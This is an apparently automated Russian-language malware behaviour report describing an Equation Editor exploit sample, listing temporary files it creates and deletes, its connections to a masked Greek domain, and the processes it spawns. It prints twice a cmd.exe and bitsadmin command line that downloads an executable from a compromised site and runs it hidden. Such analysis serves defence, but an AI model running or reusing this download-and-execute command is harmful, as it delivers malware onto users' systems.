Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe && start %TEMP%\NSa.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cabdc3e.tmp
- %WINDIR%\temp\tardc3f.tmp
- %WINDIR%\temp\cabdb53.tmp
- %WINDIR%\temp\tardc4f.tmp
- %WINDIR%\temp\cab4df6.tmp
- %WINDIR%\temp\tar4df7.tmp
- %WINDIR%\temp\cab4f50.tmp
- %WINDIR%\temp\tar4f51.tmp
- %WINDIR%\temp\cab5328.tmp
- %WINDIR%\temp\tar5329.tmp
- %WINDIR%\temp\cab6727.tmp
- %WINDIR%\temp\tar6728.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabdc3e.tmp
- %WINDIR%\temp\tardc3f.tmp
- %WINDIR%\temp\cabdb53.tmp
- %WINDIR%\temp\tardc4f.tmp
- %WINDIR%\temp\cab4df6.tmp
- %WINDIR%\temp\tar4df7.tmp
- %WINDIR%\temp\cab4f50.tmp
- %WINDIR%\temp\tar4f51.tmp
- %WINDIR%\temp\cab5328.tmp
- %WINDIR%\temp\tar5329.tmp
- %WINDIR%\temp\cab6727.tmp
- %WINDIR%\temp\tar6728.tmp
Сетевая активность
Подключается к
- 'fi###o.com.gr':443
TCP
- 'fi###o.com.gr':443
UDP
- DNS ASK fi###o.com.gr
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe && start %TEMP%\NSa.exe' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe
